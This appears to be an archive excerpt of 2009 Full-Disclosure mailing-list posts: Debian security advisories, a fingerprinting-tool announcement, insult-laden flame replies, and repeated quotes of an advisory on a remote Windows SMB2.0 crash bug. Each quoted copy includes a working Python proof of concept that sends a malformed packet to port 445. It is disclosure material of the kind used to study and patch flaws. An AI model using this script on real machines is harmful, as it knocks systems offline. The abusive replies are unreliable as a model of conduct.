[Full-disclosure] Presentation of Message-ID Fingerprinting Tool
Hello, Within penetration tests client-oriented attacks become more and more important. I have created a script which is able to determine the mail client from the message-id which is included in an email. Midfp (Message-ID Fingerprinter) is going to analyze the structure of the message-id and compare it with regular expressions against a data base. Thus, no further analysis of the email (e.g. the header structures as like in my browserrecon project; http://www.computec.ch/projekte/browserrecon/) is required. * Discussion of the Implementation (German only) http://www.scip.ch/?labs.20090911 http://www.scip.ch/?labs.20090717 * Online Demo http://www.scip.ch/labs/files/midfp/ * Download midfp-1.0php http://www.scip.ch/labs/files/midfp-1.0.tar.gz Regards, Marc Ruef -- Marc Ruef | m...@scip.ch scip AG | Badenerstrasse 551 | 8048 Zurich T +41 44 404 13 13 | F +41 44 404 13 14 Aktuelle Forschungen: http://www.scip.ch/?labs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PakBugs.Com Report
I wanna be the very best Like no one ever was To catch them is my real test My criminal justice training is my cause I will travel across the lands searching far and wide with pokemon to understand THE POWER THAT'S INSIDE POKEMON gotta catch em all (it's you and me) YOU KNOW ITS MY TEST IN ME Ohh I have no friends In a world I must defend tips.fbi.gov = Send the tip and make stuff happen! Send it in ASCII style yo And take a bite out of cybercrime On Sat, 12 Sep 2009 16:30:12 + Catch Them catch.t...@live.com wrote: As you may know these are mostly based in Pakistan involved in illegal activities which include carding, hacking, cracking etc. I am including this list of their users for law enforcement agencies to investigate and take action where neccessary. Currently their site is hosted in pacificrack.com's server. WAR Against Cyber Crime Catch Them If you can. _ Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. http://clk.atdmt.com/GBL/go/171222985/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
It's fun :-)
On Mon, September 14, 2009 12:14 pm, D-vice wrote:
You wrote an exploit in java
*head explodes*
On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
ra...@procyonlabs.comwrote:
After testing my version of the exploit (using Java instead of Python) I
tried it against a Windows Server 2008 R2 installation - it went down.
http://www.procyonlabs.com/software/smb2_bsoder
Randy
laurent gaffie wrote:
Advisory updated :
=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=
I. VULNERABILITY
-
Windows Vista, Server 2008 R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named
SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.
III. DESCRIPTION
-
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following
issue:
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to
a
SMB server, and it's used to identify the SMB dialect that will be
used
for futher communication.
IV. PROOF OF CONCEPT
-
Smb-Bsod.py:
#!/usr/bin/python
#When SMB2.0 recieve a char in the Process Id High SMB header
field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
host = IP_ADDR, 445
buff = (
\x00\x00\x00\x90 # Begin SMB header: Session message
\xff\x53\x4d\x42 # Server Component: SMB
\x72\x00\x00\x00 # Negociate Protocol
\x00\x18\x53\xc8 # Operation 0x18 sub 0xc853
\x00\x26# Process ID High: -- :) normal value should be \x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
V. BUSINESS IMPACT
-
An attacker can remotly crash any Vista/Windows 7 machine with SMB
enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.
VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server
2008
R2, Windows 7 RC.
VII. SOLUTION
-
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx
VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com
X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release
XI. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
XII.Personal Notes
-
Many persons have suggested to update this advisory for RCE and not
BSOD:
It wont be done, if they find a way to execute code, they will publish
them advisory.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Plain Text Password Disclosure vulnerability in rediff mail
To Dan, being well known is now the same as having your ass handed to ya by the like of me Think about it, its like you saying I'm jealous of Bush becouse he is was the president and Im not I'm not retarded, I don't envy epic fails On Fri, Sep 11, 2009 at 6:27 PM, valdis.kletni...@vt.edu wrote: On Fri, 11 Sep 2009 12:23:17 +0200, D-vice said: you the fuckard that got owned You're just jealous that Dan is well-known enough to be a target, and quite likely jealous of the fact that Dan *has* a site to be targeted. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PakBugs.Com Report
Rohit Patnaik quanti...@gmail.com wrote: We know that the FBI and the CIA can't even catch Osama bin Laden in Pakistan. Do you really think they're going to bother with small- time credit card skimmers? according to research though its the *small-time* skimmers funding the *big-time* terror plots. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
You wrote an exploit in java
*head explodes*
On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux ra...@procyonlabs.comwrote:
After testing my version of the exploit (using Java instead of Python) I
tried it against a Windows Server 2008 R2 installation - it went down.
http://www.procyonlabs.com/software/smb2_bsoder
Randy
laurent gaffie wrote:
Advisory updated :
=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=
I. VULNERABILITY
-
Windows Vista, Server 2008 R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.
III. DESCRIPTION
-
[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS
patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the following
issue:
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a
SMB server, and it's used to identify the SMB dialect that will be used
for futher communication.
IV. PROOF OF CONCEPT
-
Smb-Bsod.py:
#!/usr/bin/python
#When SMB2.0 recieve a char in the Process Id High SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
host = IP_ADDR, 445
buff = (
\x00\x00\x00\x90 # Begin SMB header: Session message
\xff\x53\x4d\x42 # Server Component: SMB
\x72\x00\x00\x00 # Negociate Protocol
\x00\x18\x53\xc8 # Operation 0x18 sub 0xc853
\x00\x26# Process ID High: -- :) normal value should be \x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
V. BUSINESS IMPACT
-
An attacker can remotly crash any Vista/Windows 7 machine with SMB
enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.
VI. SYSTEMS AFFECTED
-
[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008
R2, Windows 7 RC.
VII. SOLUTION
-
No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx
VIII. REFERENCES
-
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com http://gmail.com
X. REVISION HISTORY
-
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release
XI. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
XII.Personal Notes
-
Many persons have suggested to update this advisory for RCE and not BSOD:
It wont be done, if they find a way to execute code, they will publish
them advisory.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1883-2] New nagios2 packages fix regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1883-2 secur...@debian.org http://www.debian.org/security/ Giuseppe Iuculano September 14, 2009http://www.debian.org/security/faq - Package: nagios2 Vulnerability : missing input sanitising Problem type : remote Debian-specific: no CVE Ids: CVE-2007-5624 CVE-2007-5803 CVE-2008-1360 Debian Bugs: 448371 482445 485439 The previous nagios2 update introduced a regression, which caused status.cgi to segfault when used directly without specifying the 'host' variable. This update fixes the problem. For reference the original advisory text follows. Several vulnerabilities have been found in nagios2, ahost/service/network monitoring and management system. The Common Vulnerabilities and Exposures project identifies the following problems: Several cross-site scripting issues via several parameters were discovered in the CGI scripts, allowing attackers to inject arbitrary HTML code. In order to cover the different attack vectors, these issues have been assigned CVE-2007-5624, CVE-2007-5803 and CVE-2008-1360. For the oldstable distribution (etch), these problems have been fixed in version 2.6-2+etch5. The stable distribution (lenny) does not include nagios2 and nagios3 is not affected by these problems. The testing distribution (squeeze) and the unstable distribution (sid) do not contain nagios2 and nagios3 is not affected by these problems. We recommend that you upgrade your nagios2 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Debian GNU/Linux 5.0 alias lenny - Debian (oldstable) - -- Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch5.diff.gz Size/MD5 checksum:35726 1c9d7955bb59162fa82934ef12c53d73 http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch5.dsc Size/MD5 checksum: 948 93eeeb6eb5ba0d7d3d5c659f9cc762e4 http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6.orig.tar.gz Size/MD5 checksum: 1734400 a032edba07bf389b803ce817e9406c02 Architecture independent packages: http://security.debian.org/pool/updates/main/n/nagios2/nagios2-common_2.6-2+etch5_all.deb Size/MD5 checksum:59516 8edae60c2b64183afbd5b5c5c79df649 http://security.debian.org/pool/updates/main/n/nagios2/nagios2-doc_2.6-2+etch5_all.deb Size/MD5 checksum: 1150060 c5b23e507b405aed13e6148381a5161f alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch5_alpha.deb Size/MD5 checksum: 120 33fac2a26d60b48a2e3d6cc03ef161f2 http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch5_alpha.deb Size/MD5 checksum: 1703082 685386628adefdea4ef139d8d073be57 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch5_amd64.deb Size/MD5 checksum: 1688192 fdc3c934dc4e0afa728d9789fc1071aa http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch5_amd64.deb Size/MD5 checksum: 1098470 c08807062733811fa047eb15d9727c82 arm architecture (ARM) http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch5_arm.deb Size/MD5 checksum: 1025042 a9d7fa95c7eac54287a2e73478ea3ba6 http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch5_arm.deb Size/MD5 checksum: 1537944 59b06b0f6ae1061d01a7f1a7b85fb4b4 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch5_hppa.deb Size/MD5 checksum: 1621998 07cca557bc05cb0f4845f05c0d2b9311 http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch5_hppa.deb Size/MD5 checksum: 1148900 d5b10578c95a21ce66ff11cc5a870047 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/n/nagios2/nagios2-dbg_2.6-2+etch5_i386.deb Size/MD5 checksum: 1587914 84dcc6957ce50c2b6e7ff243d21b5e8d http://security.debian.org/pool/updates/main/n/nagios2/nagios2_2.6-2+etch5_i386.deb Size/MD5 checksum: 1017162 d57c40f4621e185fee5fe0bbd814b7d5 ia64
[Full-disclosure] [SECURITY] [DSA 1885-1] New xulrunner packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1885-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff September 14, 2009http://www.debian.org/security/faq - Package: xulrunner Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-3070 CVE-2009-3071 CVE-2009-3072 CVE-2009-3074 CVE-2009-3075 CVE-2009-3076 CVE-2009-3077 CVE-2009-3078 Several remote vulnerabilities have been discovered in Xulrunner, a runtime environment for XUL applications, such as the Iceweasel web browser. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-3070 Jesse Ruderman discovered crashes in the layout engine, which might allow the execution of arbitrary code. CVE-2009-3071 Daniel Holbert, Jesse Ruderman, Olli Pettay and toshi discovered crashes in the layout engine, which might allow the execution of arbitrary code. CVE-2009-3072 Josh Soref, Jesse Ruderman and Martin Wargers discovered crashes in the layout engine, which might allow the execution of arbitrary code. CVE-2009-3074 Jesse Ruderman discovered a crash in the Javascript engine, which might allow the execution of arbitrary code. CVE-2009-3075 Carsten Book and Taral discovered crashes in the layout engine, which might allow the execution of arbitrary code. CVE-2009-3076 Jesse Ruderman discovered that the user interface for installing/ removing PCKS #11 securiy modules wasn't informative enough, which might allow social engineering attacks. CVE-2009-3077 It was discovered that incorrect pointer handling in the XUL parser could lead to the execution of arbitrary code. CVE-2009-3078 Juan Pablo Lopez Yacubian discovered that incorrent rendering of some Unicode font characters could lead to spoofing attacks on the location bar. For the stable distribution (lenny), these problems have been fixed in version 1.9.0.14-0lenny1. As indicated in the Etch release notes, security support for the Mozilla products in the oldstable distribution needed to be stopped before the end of the regular Etch security maintenance life cycle. You are strongly encouraged to upgrade to stable or switch to a still supported browser. For the unstable distribution (sid), these problems have been fixed in version 1.9.0.14-1. For the experimental distribution, these problems have been fixed in version 1.9.1.3-1. We recommend that you upgrade your xulrunner package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.14.orig.tar.gz Size/MD5 checksum: 44131944 c7e120fb285ad462875f11f8071da424 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.14-0lenny1.dsc Size/MD5 checksum: 1779 b631f42a41844e224e6275d98dd44bf2 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.14-0lenny1.diff.gz Size/MD5 checksum: 115910 4d0bc123fd05c050c5b834c6f39f8e4a Architecture independent packages: http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.14-0lenny1_all.deb Size/MD5 checksum: 1464198 f481e96692d78859d3a6a65721545d99 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.14-0lenny1_alpha.deb Size/MD5 checksum: 3355164 c636eea6a110a24a559bb28c20a2e8eb http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.14-0lenny1_alpha.deb Size/MD5 checksum: 113034 1b5c67690491fc0e331c98e05fb87051 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.14-0lenny1_alpha.deb Size/MD5 checksum: 51088250 aa180bd2cdfbf897f2e0ac3560a8cc40 http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.14-0lenny1_alpha.deb Size/MD5 checksum:71840 a07593d426877325cd152a263f51f2b4 http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.14-0lenny1_alpha.deb Size/MD5 checksum: 165048 43c19aa5d7b0156cf589ed0b6e993910
[Full-disclosure] [SECURITY] [DSA 1886-1] New iceweasel packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1886-1 secur...@debian.org http://www.debian.org/security/ Moritz Muehlenhoff September 14, 2009http://www.debian.org/security/faq - Package: iceweasel Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2009-1310 CVE-2009-3079 Several remote vulnerabilities have been discovered in the Iceweasel web browser, an unbranded version of the Firefox browser. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-3079 moz_bug_r_a4 discovered that a programming error in the FeedWriter module could lead to the execution of Javascript code with elevated privileges. CVE-2009-1310 Prateek Saxena discovered a cross-site scripting vulnerability in the MozSearch plugin interface. For the stable distribution (lenny), these problems have been fixed in version 3.0.6-3. As indicated in the Etch release notes, security support for the Mozilla products in the oldstable distribution needed to be stopped before the end of the regular Etch security maintenance life cycle. You are strongly encouraged to upgrade to stable or switch to a still supported browser. For the unstable distribution (sid), these problems have been fixed in version 3.0.14-1. For the experimental distribution, these problems have been fixed in version 3.5.3-1. We recommend that you upgrade your iceweasel packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_3.0.6.orig.tar.gz Size/MD5 checksum: 43638341 123875f8a441c8dc950088229a23af8e http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_3.0.6-3.dsc Size/MD5 checksum: 1352 12684eeb2239d0e12b736140cbc7f970 http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_3.0.6-3.diff.gz Size/MD5 checksum: 159783 ca3ee1ad4a9fa69288208e5409d915d6 Architecture independent packages: http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-gnome-support_3.0.6-3_all.deb Size/MD5 checksum:68942 32d1b0b1fa5320ace47f863a8d73698b alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_3.0.6-3_alpha.deb Size/MD5 checksum: 435752 4f1f3bab9a0249a2c2675def1e2486d5 http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_3.0.6-3_alpha.deb Size/MD5 checksum: 1163948 65f8c23d44cd0e107e240d9cf340b1ba amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_3.0.6-3_amd64.deb Size/MD5 checksum: 432332 05fc420b5d153046dff84e114bfef28b http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_3.0.6-3_amd64.deb Size/MD5 checksum: 1142034 59351920cef676904d991be488e09e0c arm architecture (ARM) http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_3.0.6-3_arm.deb Size/MD5 checksum: 423356 99b03476daadb9bb7a1d4a70e765f659 http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_3.0.6-3_arm.deb Size/MD5 checksum: 1130994 1a5f67c727c5c58a48319c9c0279a808 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_3.0.6-3_armel.deb Size/MD5 checksum: 429092 208d4fa68daf2ca9c746f431ce2e9756 http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_3.0.6-3_armel.deb Size/MD5 checksum: 1132786 9f744b400706d3091f09a5f2cc5e3b4c hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_3.0.6-3_hppa.deb Size/MD5 checksum: 435772 c5d7f8f7dcd5276bc0646f7e8a35d3e1 http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_3.0.6-3_hppa.deb Size/MD5 checksum: 1169756 cdb9c075d664b926f7dc62fbff8b0727 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dbg_3.0.6-3_i386.deb Size/MD5 checksum: 420584 2aeb1ad62ab939d7498be272a4a575a5 http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_3.0.6-3_i386.deb Size/MD5
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
Oh WOW! More exploit code ported to Java!! Hello Randy, Not everyone would have gone to all the trouble you did for me and I want you to know how much I appreciate it. It seems that you are always going above and beyond the call of duty. No wonder so many people are happy and proud to call you an elite h4x0r. It was really wonderful of you to direct port Laurent's SMB2.0 BSOD python exploit code in to Java and call it your own, and I'll never be able to thank you enough. However, in doing so, an apology to Laurent AND the FD list for the dissemination of your Java port and post to FD mailing list is therefore required. There is simply no need for Java in any circumstances, and it is truly a shame to see such a wonderful exploit treated in such a horrendous way. Perhaps if you added, removed or improved the exploit, an apology would not have been required... but you didn't. Thanks for you time, /rd for dem geeks rdy to bounce 'em Ya my number two on some old school DJ Screw You can't arrest me, plus you can't sue This is a message to the laws, tell 'em We hate you I could be tough tell 'em that they shoulda known Tippin down, sittin crooked on my chrome Bookin my phone, findin a chick I wanna bone Like they couldn't stop me I'm bout to pull up at your home, and it's on ... It's fun :-) On Mon, September 14, 2009 12:14 pm, D-vice wrote: You wrote an exploit in java *head explodes* On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux randy_at_procyonlabs.comwrote: After testing my version of the exploit (using Java instead of Python) I tried it against a Windows Server 2008 R2 installation - it went down. http://www.procyonlabs.com/software/smb2_bsoder Randy laurent gaffie wrote: Advisory updated : = - Release date: September 7th, 2009 - Discovered by: Laurent Gaffi� - Severity: High = I. VULNERABILITY - Windows Vista, Server 2008 R2, 7 RC : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. II. BACKGROUND - Windows vista and newer Windows comes with a new SMB version named SMB2. See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S erver_Message_Block_2.0 for more details. III. DESCRIPTION - [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue: KB942624 (MS07-063) Installing only this specific update on Vista SP0 create the following issue: SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication. IV. PROOF OF CONCEPT - Smb-Bsod.py: #!/usr/bin/python #When SMB2.0 recieve a char in the Process Id High SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket host = IP_ADDR, 445 buff = ( \x00\x00\x00\x90 # Begin SMB header: Session message \xff\x53\x4d\x42 # Server Component: SMB \x72\x00\x00\x00 # Negociate Protocol \x00\x18\x53\xc8 # Operation 0x18 sub 0xc853 \x00\x26# Process ID High: -- :) normal value should be \x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54 \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31 \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00 \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57 \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61 \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e \x30\x30\x32\x00 ) s = socket() s.connect(host) s.send(buff) s.close() V. BUSINESS IMPACT - An attacker can remotly crash any Vista/Windows 7 machine with SMB enable. Windows Xp, 2k, are NOT affected as they dont have this driver. VI. SYSTEMS AFFECTED - [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 R2, Windows 7 RC. VII. SOLUTION - No patch available for the moment. Close SMB feature and ports, until a patch is provided. Configure your firewall properly You can also follow the MS Workaround: http://www.microsoft.com/technet/security/advisory/975497.mspx VIII. REFERENCES - http://www.microsoft.com/technet/security/advisory/975497.mspx http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-
Re: [Full-disclosure] PakBugs.Com Report
We know that the FBI and the CIA can't even catch Osama bin Laden in Pakistan. Do you really think they're going to bother with small-time credit card skimmers? --Rohit Patnaik TheLearner wrote: I wanna be the very best Like no one ever was To catch them is my real test My criminal justice training is my cause I will travel across the lands searching far and wide with pokemon to understand THE POWER THAT'S INSIDE POKEMON gotta catch em all (it's you and me) YOU KNOW ITS MY TEST IN ME Ohh I have no friends In a world I must defend tips.fbi.gov = Send the tip and make stuff happen! Send it in ASCII style yo And take a bite out of cybercrime On Sat, 12 Sep 2009 16:30:12 + Catch Them catch.t...@live.com wrote: As you may know these are mostly based in Pakistan involved in illegal activities which include carding, hacking, cracking etc. I am including this list of their users for law enforcement agencies to investigate and take action where neccessary. Currently their site is hosted in pacificrack.com's server. WAR Against Cyber Crime Catch Them If you can. _ Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. http://clk.atdmt.com/GBL/go/171222985/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1884-1] New nginx packages fix arbitrary code execution
